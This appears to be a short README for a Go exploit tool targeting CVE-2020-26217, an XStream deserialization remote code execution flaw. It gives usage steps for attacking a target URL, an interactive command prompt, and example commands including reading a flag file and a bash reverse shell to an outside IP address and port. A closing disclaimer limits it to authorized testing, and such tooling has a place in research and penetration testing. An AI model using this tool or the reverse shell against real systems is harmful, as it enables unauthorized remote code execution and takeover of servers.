
CVE-2020-26217 XStream反序列化的poc
XStream Remote Code Execution Vulnerability Exploit Tool.
CVE-2020-26217 is a deserialization vulnerability in the XStream library that allows an attacker to trigger remote code execution by crafting malicious XML data.
Affected versions: XStream <= 1.4.13
go run poc.go <target URL>
# Run the tool
go run poc.go http://target.com:8080/?data
# After entering interactive mode, input commands
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
This tool is intended for security research and authorized testing only. Do not use it for illegal purposes. Users assume all related legal responsibilities.